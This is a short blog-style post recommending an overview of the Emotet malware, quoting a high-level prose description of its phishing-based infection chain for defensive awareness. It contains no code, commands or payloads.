Emotet technical/behavior overview
This is a great article covering the basics of the Emotet malware that has been active in recent months. While not a hard-core drilldown into code, it gives anyone the ability to watch for certain files, block particular URLs, and understand the infection lifecycle so they know what not to do (hopefully in the future, but likely what not to do again).
“Emotet is principally delivered as part of an email phishing campaign. The user would receive a reasonably well-constructed email which claims to have an invoice, or an order, or and an unpaid bill. The user opens the document, which could be one of many malware types. The document will then invoke a batch script, followed by a PowerShell, to cycle through a number of URLs for hijacked websites to download the Emotet payload. The payload will run, persisting itself, and then get on with the job of being evil.”
Mentioned: